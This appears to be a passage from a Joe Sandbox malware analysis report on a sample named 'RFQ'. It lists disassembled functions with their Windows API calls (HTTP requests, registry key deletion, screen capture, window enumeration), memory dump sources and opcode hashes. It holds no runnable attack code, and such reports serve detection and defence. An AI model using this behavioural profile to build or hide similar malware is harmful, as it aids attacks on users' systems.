                                                                            • InternetCloseHandle.WININET(00000000), ref: 006FC519
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                            • String ID:
                                                                            • API String ID: 3800310941-3916222277
                                                                            • Opcode ID: 163d9d7b33dd755b878e32404eb4e358da537353837cc3a017bd06f7fdc8cc63
                                                                            • Instruction ID: 3a96333c5f4c78850e7b8a01ac7f99fd37c11267016b36af7e56952c01673c55
                                                                            • Opcode Fuzzy Hash: 163d9d7b33dd755b878e32404eb4e358da537353837cc3a017bd06f7fdc8cc63
                                                                            • Instruction Fuzzy Hash: 9E516AB150060CBFDB229FA4C988AFA7BFDFF08764F04841AFA4596290D774E904DB64
                                                                            Function 00718461 Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00718484
                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00718494
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0071849F
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007184AC
                                                                            • GlobalLock.KERNEL32(00000000), ref: 007184BA
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 007184C9
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 007184D2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007184D9
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 007184EA
                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,0071FC54,?), ref: 00718503
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00718513
                                                                            • GetObjectW.GDI32(?,00000018,000000FF), ref: 00718533
                                                                            • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00718563
                                                                            • DeleteObject.GDI32(00000000), ref: 0071858B
                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007185A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                            • String ID:
                                                                            • API String ID: 3840717409-0
                                                                            • Opcode ID: 9264acb18e437ef0a2d2fecef21bc4874fe451cdc027f17d133d6cd72dcf2124
                                                                            • Instruction ID: 95fb2e88f25589583e5b9cba8fdd3e2ed6086c3e34410f397b78c9d49a0522a6
                                                                            • Opcode Fuzzy Hash: 9264acb18e437ef0a2d2fecef21bc4874fe451cdc027f17d133d6cd72dcf2124
                                                                            • Instruction Fuzzy Hash: 5E413C75640208BFDB119FA9CC48EEA7BB9FF89711F10C058F905E72A0DB389A41DB65
                                                                            Function 006F13DB Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(00000000), ref: 006F1420
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 006F1429
                                                                            • VariantClear.OLEAUT32(?), ref: 006F1435
                                                                            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 006F1519
                                                                            • VarR8FromDec.OLEAUT32(?,?), ref: 006F1575
                                                                            • VariantInit.OLEAUT32(?), ref: 006F1626
                                                                            • SysFreeString.OLEAUT32(?), ref: 006F16AA
                                                                            • VariantClear.OLEAUT32(?), ref: 006F16F6
                                                                            • VariantClear.OLEAUT32(?), ref: 006F1705
                                                                            • VariantInit.OLEAUT32(00000000), ref: 006F1741
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                            • API String ID: 1234038744-3931177956
                                                                            • Opcode ID: 7716192fbf8add7dcf6ced0bf055f34640f483c8cc68f1c40dedd434374c356e
                                                                            • Instruction ID: 1cfb9027e1bae390c32a5e5a0eea52b5e0e1b1f426a4e1d058dc7112cc4cc8f5
                                                                            • Opcode Fuzzy Hash: 7716192fbf8add7dcf6ced0bf055f34640f483c8cc68f1c40dedd434374c356e
                                                                            • Instruction Fuzzy Hash: E6D12271A00219DBCB10EFA9D844BB9B7F6FF46740F148159EA19AF281CB34EC41DBA5
                                                                            Function 0070B535 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                              • Part of subcall function 0070C8BF: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0070B5D5,?,?), ref: 0070C8DC
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C918
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C98F
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C9C5
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0070B61B
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0070B699
                                                                            • RegDeleteValueW.ADVAPI32(?,?), ref: 0070B731
                                                                            • RegCloseKey.ADVAPI32(?), ref: 0070B7A5
                                                                            • RegCloseKey.ADVAPI32(?), ref: 0070B7C3
                                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0070B819
                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0070B82B
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 0070B849
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0070B8AA
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0070B8BB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                            • API String ID: 146587525-4033151799
                                                                            • Opcode ID: 8909f559d05e5ea391fdf47cfc6b156701d561d42b8df52b97d20f9a1dfd83d2
                                                                            • Instruction ID: 256d46885af3f8873577bd74c5cbdccfb427ea30f298b401cc5ef9ad7bba0506
                                                                            • Opcode Fuzzy Hash: 8909f559d05e5ea391fdf47cfc6b156701d561d42b8df52b97d20f9a1dfd83d2
                                                                            • Instruction Fuzzy Hash: 41C15A71204241EFD710DF24C495F2ABBE5AF84318F18869CE4598B2E2CB79EE45CB95
                                                                            Function 00702483 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 007024FF
                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0070250F
                                                                            • CreateCompatibleDC.GDI32(?), ref: 0070251B
                                                                            • SelectObject.GDI32(00000000,?), ref: 00702528
                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00702594
                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 007025D3
                                                                            • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 007025F7
                                                                            • SelectObject.GDI32(?,?), ref: 007025FF
                                                                            • DeleteObject.GDI32(?), ref: 00702608
                                                                            • DeleteDC.GDI32(?), ref: 0070260F
                                                                            • ReleaseDC.USER32(00000000,?), ref: 0070261A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                            • String ID: (
                                                                            • API String ID: 2598888154-3887548279
                                                                            • Opcode ID: bbf4c6c455902263f5ee8d7b6823c6aeca7489d84ed144ab3814fe2f6ba9cd90
                                                                            • Instruction ID: 212ed5d3b007c9139a689ed3a6f79ef64b7bdafd1522c60a978e625ae830bcb5
                                                                            • Opcode Fuzzy Hash: bbf4c6c455902263f5ee8d7b6823c6aeca7489d84ed144ab3814fe2f6ba9cd90
                                                                            • Instruction Fuzzy Hash: C561F2B6D00219EFCF05CFE8C888AAEBBF6FF48310F208559E555A7250D734A9518F54
                                                                            Function 006BD9FD Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ___free_lconv_mon.LIBCMT ref: 006BDA41
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD5F9
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD60B
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD61D
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD62F
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD641
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD653
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD665
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD677
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD689
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD69B
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD6AD
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD6BF
                                                                              • Part of subcall function 006BD5DC: _free.LIBCMT ref: 006BD6D1
                                                                            • _free.LIBCMT ref: 006BDA36
                                                                              • Part of subcall function 006B2958: RtlFreeHeap.NTDLL(00000000,00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000), ref: 006B296E
                                                                              • Part of subcall function 006B2958: GetLastError.KERNEL32(00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000,00000000), ref: 006B2980
                                                                            • _free.LIBCMT ref: 006BDA58
                                                                            • _free.LIBCMT ref: 006BDA6D
                                                                            • _free.LIBCMT ref: 006BDA78
                                                                            • _free.LIBCMT ref: 006BDA9A
                                                                            • _free.LIBCMT ref: 006BDAAD
                                                                            • _free.LIBCMT ref: 006BDABB
                                                                            • _free.LIBCMT ref: 006BDAC6
                                                                            • _free.LIBCMT ref: 006BDAFE
                                                                            • _free.LIBCMT ref: 006BDB05
                                                                            • _free.LIBCMT ref: 006BDB22
                                                                            • _free.LIBCMT ref: 006BDB3A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                            • String ID:
                                                                            • API String ID: 161543041-0
                                                                            • Opcode ID: 49ae6e4b453413162e6fbdcfe2d53e625968398e4f4018e04fb9afb015c069fa
                                                                            • Instruction ID: 6029720856f35a0320703b6759409cb257df8e1daa1c074fbea25c3120544ff6
                                                                            • Opcode Fuzzy Hash: 49ae6e4b453413162e6fbdcfe2d53e625968398e4f4018e04fb9afb015c069fa
                                                                            • Instruction Fuzzy Hash: A5315CF16043069FEB60AA39D845BDA77EABF10351F14482DE558DB251EF30ADC1CB14
                                                                            Function 006E359E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 268windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 006E35DF
                                                                            • _wcslen.LIBCMT ref: 006E35EA
                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 006E36DA
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 006E374F
                                                                            • GetDlgCtrlID.USER32(?), ref: 006E37A5
                                                                            • GetWindowRect.USER32(?,?), ref: 006E37CA
                                                                            • GetParent.USER32(?), ref: 006E37E8
                                                                            • ScreenToClient.USER32(00000000), ref: 006E37EF
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 006E3869
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 006E38A5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                            • String ID: %s%u
                                                                            • API String ID: 4010501982-679674701
                                                                            • Opcode ID: 5b63ece5dc1d9fdbdfe4508900e526ef2c244c3e96d506881c15f0795f959b39
                                                                            • Instruction ID: 8f3b045963d09277c1f79dcfc637eb5806ba5e3704a1cadf5c41117412e639d4
                                                                            • Opcode Fuzzy Hash: 5b63ece5dc1d9fdbdfe4508900e526ef2c244c3e96d506881c15f0795f959b39
                                                                            • Instruction Fuzzy Hash: 6AA1C071205756AFD719DF65C889BEBB7EAFF44300F008529F99A83290DB30EA45CB91
                                                                            Function 006E489C Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 255COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 006E48DC
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 006E4922
                                                                            • _wcslen.LIBCMT ref: 006E4933
                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 006E493F
                                                                            • _wcsstr.LIBVCRUNTIME ref: 006E4974
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 006E49AC
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 006E49E9
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 006E4A37
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 006E4A71
                                                                            • GetWindowRect.USER32(?,?), ref: 006E4AE1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                            • String ID: ThumbnailClass
                                                                            • API String ID: 1311036022-1241985126
                                                                            • Opcode ID: 9e7672a643fc2e78f10cba926ae47a0b4db260afec34394b253f80c603e8093d
                                                                            • Instruction ID: 01ae82ff1f39755737bcf5d3e482e8b24f1ac5b82ae978ce272bece2e4598ccb
                                                                            • Opcode Fuzzy Hash: 9e7672a643fc2e78f10cba926ae47a0b4db260afec34394b253f80c603e8093d
                                                                            • Instruction Fuzzy Hash: 9C910E711053459FDB04DF2AC881BAA77EAFF84310F048469FD859A296EF34ED46CBA1
                                                                            Function 0070CB5B Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0070CB8B
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0070CBB4
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0070CC6F
                                                                              • Part of subcall function 0070CB5B: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0070CBD1
                                                                              • Part of subcall function 0070CB5B: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0070CBE4
                                                                              • Part of subcall function 0070CB5B: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0070CBF6
                                                                              • Part of subcall function 0070CB5B: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0070CC2C
                                                                              • Part of subcall function 0070CB5B: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0070CC4F
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 0070CC1A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                            • API String ID: 2734957052-4033151799
                                                                            • Opcode ID: b7918c6a63c16be7690af0bf0d0b33e32e957b0992f0f626382812c45b0b6b2e
                                                                            • Instruction ID: b32a4d07f647371c96d7e8af284f47718c5bee04af13e7fa5c8e45249722d61b
                                                                            • Opcode Fuzzy Hash: b7918c6a63c16be7690af0bf0d0b33e32e957b0992f0f626382812c45b0b6b2e
                                                                            • Instruction Fuzzy Hash: EE3182B1941118FBE7228B95DC88EEFBBBCEF05740F008255B906E2190DB389E45DAB0
                                                                            Function 006F3C3C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006F3C5E
                                                                            • _wcslen.LIBCMT ref: 006F3C8B
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 006F3CBB
                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 006F3CDC
                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 006F3CEC
                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 006F3D73
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006F3D7E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006F3D89
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                            • String ID: :$\$\??\%s
                                                                            • API String ID: 1149970189-3457252023
                                                                            • Opcode ID: c5366312cda2e7fdeb88176f51ba73e42b82a6dab3327f5c129dcdac96fa2d7c
                                                                            • Instruction ID: c5e96da5415d191ae407c3c9adf900b76e19eed8e4272005218f703f68b9a0a9
                                                                            • Opcode Fuzzy Hash: c5366312cda2e7fdeb88176f51ba73e42b82a6dab3327f5c129dcdac96fa2d7c
                                                                            • Instruction Fuzzy Hash: DD31D675540119ABDB219BA4DC49FEB33BEFF89700F1080B5F605E6290EB7497448B28
                                                                            Function 006EE5CE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • timeGetTime.WINMM ref: 006EE5D2
                                                                              • Part of subcall function 0069E465: timeGetTime.WINMM(?,?,006EE5F2), ref: 0069E469
                                                                            • Sleep.KERNEL32(0000000A), ref: 006EE5FF
                                                                            • EnumThreadWindows.USER32(?,Function_0006E583,00000000), ref: 006EE623
                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 006EE645
                                                                            • SetActiveWindow.USER32 ref: 006EE664
                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006EE672
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 006EE691
                                                                            • Sleep.KERNEL32(000000FA), ref: 006EE69C
                                                                            • IsWindow.USER32 ref: 006EE6A8
                                                                            • EndDialog.USER32(00000000), ref: 006EE6B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                            • String ID: BUTTON
                                                                            • API String ID: 1194449130-3405671355
                                                                            • Opcode ID: 7d2b31ea81866b955d954da85d625860ce26bcbeda86604632ef423395f70ddb
                                                                            • Instruction ID: 78261e064b786b216a3848aa8dbab7d090ab57b0e90497ac9639ef54f9154b1f
                                                                            • Opcode Fuzzy Hash: 7d2b31ea81866b955d954da85d625860ce26bcbeda86604632ef423395f70ddb
                                                                            • Instruction Fuzzy Hash: 2B21C6B0341344AFEB125FA5EC89BA53B6BF756746F04C415F801826F2DBBAAC05CA5C
                                                                            Function 006EE91A Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006EE97B
                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 006EE991
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006EE9A2
                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 006EE9B4
                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 006EE9C5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
